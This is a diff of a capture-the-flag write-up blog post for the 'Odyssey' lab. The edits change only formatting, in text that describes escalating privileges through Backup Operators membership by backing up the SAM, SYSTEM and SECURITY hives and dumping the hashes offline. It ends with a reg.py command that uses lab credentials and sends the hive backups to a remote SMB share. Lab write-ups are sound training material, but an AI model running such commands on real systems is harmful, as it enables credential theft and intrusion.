UZURLY/uzurly.github.io/_posts/2025-01-12-odyssey-hard.md

 ```

 ![23](/assets/img/Writeup/Hacksmarter/Odyssey/23.png)
-#### However, none of the passwords found in the notes were valid.
+ However, none of the passwords found in the notes were valid.
-#### Running `whoami /all` revealed that the account belonged to a group with elevated or misconfigured privileges, indicating a potential privilege‑escalation path on the system.
+ Running `whoami /all` revealed that the account belonged to a group with elevated or misconfigured privileges, indicating a potential privilege‑escalation path on the system.
 ![22](/assets/img/Writeup/Hacksmarter/Odyssey/22.png)
+## Privilege escalation of Backup Operators group
-#### As the account was a member of the **Backup Operators** group, it could access and back up sensitive system files.
+ As the account was a member of the **Backup Operators** group, it could access and back up sensitive system files.
-#### Using this privilege, I created backups of the SYSTEM, SAM, and SECURITY hives.
+ Using this privilege, I created backups of the SYSTEM, SAM, and SECURITY hives.
-#### Once exported, these files allowed me to perform an offline credential extraction using secretdump, recovering all local account hashes.
+ Once exported, these files allowed me to perform an offline credential extraction using secretdump, recovering all local account hashes.

 ```
 reg.py /"ghill_sa":'P@ssw0rd!'@"10.1.182.10"  backup -o '\\10.200.22.195\EXEGOL'